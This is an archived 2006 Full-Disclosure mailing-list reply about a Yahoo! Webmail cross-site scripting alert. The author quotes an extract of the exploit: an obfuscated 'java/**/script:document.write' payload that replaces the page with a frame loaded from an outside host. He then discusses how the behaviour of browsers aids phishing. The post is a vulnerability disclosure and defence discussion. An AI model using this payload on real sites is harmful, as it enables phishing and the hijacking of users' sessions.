lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Tue Apr 18 16:19:04 2006 From: cesarc56 at yahoo.com (Cesar) Subject: [Argeniss] Alert - Yahoo! Webmail XSS I know what a Frame it's, but if I forget I know that you will be there for remind me, thanks.. If you look at the extract of the exploit: ----------------------------------- (java/**/script:document.write('<frameset cols=100% rows=100% border=0 frameboarder=0framespacing=0><frame frameborder=0 src=http://w00tynetwork.com/x/></frameset>')) ----------------------------------- You can see that the whole HTML document is replaced after the "document.write" and the frameset only references a URL that is not under Yahoo! domain. This means that all displayed content will be from an external domain, I wonder if web browsers could do something to alert about this and not just display the external URL on the status bar. This default browser behaviour makes phishing a lot easier. Cesar. --- Thierry Zoller <Thierry@...ler.lu> wrote: > Dear Cesar Cesar, > > > C> for a couple of seconds a weird URL, address bar > C> didn't change (MS please change this behaviour!), > but > You know what a Frame is do you ? All browsers > display the source of > the html page in the URL bar, not the source of the > frame(s). > > -- > http://secdev.zoller.lu > Thierry Zoller > Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 > 75DD 0AC6 F1C7 > > __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com
Powered by blists - more mailing lists